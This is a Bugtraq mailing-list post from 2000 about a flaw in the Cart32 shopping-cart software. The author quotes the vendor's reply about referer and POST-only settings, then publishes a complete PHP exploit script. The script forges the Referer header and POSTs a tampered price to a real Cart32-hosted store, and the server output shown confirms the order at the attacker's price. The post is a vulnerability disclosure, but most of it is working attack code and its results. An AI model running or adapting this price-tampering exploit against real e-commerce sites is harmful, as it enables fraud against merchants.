Bugtraq mailing list archives
Re: Another hole in Cart32
From: cdi () THEWEBMASTERS NET (CDI)
Date: Tue, 23 May 2000 14:05:03 -0700
On Mon, 22 May 2000, sert sert wrote:
I attempted to contact the vendor earlier last month about resolving this problem and received the attached reply. They seem to be relying on the client to properly use the security options available in the package. John Scimone johnscimone () hotmail com
[snip] What we did to help prevent this was add two fields into the Cart32 administration. The most important one is called "Domains to accept orders". What you do with that is list all of the domains that can have pages on them. Usually you would list your domain name and your secure domain if it different. Ex. www.cart32.com,cart32.com,secure.cart32.com [snip] The other field is called POST required. This means that a form must use Method=post and not method=get. Also that means links, which use the GET method, will not add to the cart." Mark Pilkenton Cart32 Technical Support (417) 865-1283 support () cart32 com --END This message is mainly for Mark and the Cart32 engineers - the BugTraq faithful are already well aware that the above "security options" are a complete joke and a total waste of time. Client submitted data should never even be -trusted-, let alone be the basis for your applications data integrity. Here - let's pull the security blanket off of Cart32 and show them the cold, hard, facts of life. This also shows that Cart32.com doesn't take it's own damn advice... ----begin cart32.phtml (a PHP exploit for Cart32 Stupidity)---- <?php /* Caution - long lines ahead. Cart32.phtml Bypass lame "security" options by providing our own referer and tainted data via POST. cdi () thewebmasters net PostToHost() Heavily modified version of Rasmus' PostToHost function It's generic enough to handle any method containing just about any data. $data: urlencoded QUERY_STRING format $cookie: urlencoded cookie string format (name=value;name=value). */ function PostToHost($host="",$port="80",$method="POST",$path="",$data="",$refer="",$client="",$cookie="") { $fp = fsockopen($host,$port); if(!$fp) { echo "Failed to open port"; exit; } fputs($fp, "$method $path HTTP/1.0\n"); if($cookie != "") { fputs($fp, "Cookie: $cookie\n"); } if($refer != "") { fputs($fp, "Referer: $refer\n"); } if($client != "") { fputs($fp, "User-Agent: $client\n"); } if($method == "POST") { fputs($fp, "Content-type: application/x-www-form-urlencoded\n"); fputs($fp, "Content-length: " . strlen($data) . "\n"); } fputs($fp, "Connection: close\n\n"); if($method == "POST") { fputs($fp, "$data\n"); } $results = ""; while(!feof($fp)) { $results .= fgets($fp, 1024); } fclose($fp); return $results; } // Whee, now all we need to do is set up the data $host = 'www.cart32.com'; $port = 80; $method = "POST"; $path = '/cgi-bin/cart32.exe/justsocks-AddItem'; $refer = 'www.IGuessYouDontTakeYourOwnAdvice..com'; // And even if they did, we could set the Referer to match // anything we wanted. $client = 'CDI Spoof (v1.0)'; $cookie = ""; // Real price of this product was $6.99 $data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite'; // And now call the function $raw = PostToHost($host,$port,$method,$path,$data,$refer,$client,$cookie); print "<PRE>\n\n"; print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n"; print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n"; print " Data: [$data]\n"; print "</PRE>\n"; print "<P>Results of operation:<BR><HR NOSHADE><P>\n"; print "$raw\n"; ?> The JustSocks site is real and is hosted by Cart32.com - the data sent above resulted in the following: (html removed) Host: www.cart32.com Port: [80] Method: [POST] Path: [/cgi-bin/cart32.exe/justsocks-AddItem] Referer: [www.IGuessYouDontTakeYourOwnAdvice.com] Client: [CDI Spoof (v1.0)] Cookie: [] Data: [Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite] Results of operation: HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Tue, 23 May 2000 20:54:04 GMT Content-type: text/html Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT Added quantity 5 of Wigwam Triathlete Ultra-Lite for $1,000.56 each CDI ____________________________________ The Web Master's Net http://www.thewebmasters.net/ Today's Excuse: poor power conditioning
Current thread:
- Re: Another hole in Cart32 sert sert (May 22)
- Qpopper 2.53 remote problem, user can gain gid=mail Prizm (May 23)
- Re: Qpopper 2.53 remote problem, user can gain gid=mail Jose Nazario (May 24)
- Re: Qpopper 2.53 remote problem, user can gain gid=mail Qpopper Support (May 24)
- Re: Qpopper 2.53 remote problem, user can gain gid=mail Sebastian (May 25)
- RFP2K05 - NetProwler "Fragmentation" Issue AXENT Security Team (May 23)
- Re: Another hole in Cart32 CDI (May 23)
- <Possible follow-ups>
- Re: Another hole in Cart32 Clover Andrew (May 23)
- Re: Another hole in Cart32 Justin King (May 24)
- Qpopper 2.53 remote problem, user can gain gid=mail Prizm (May 23)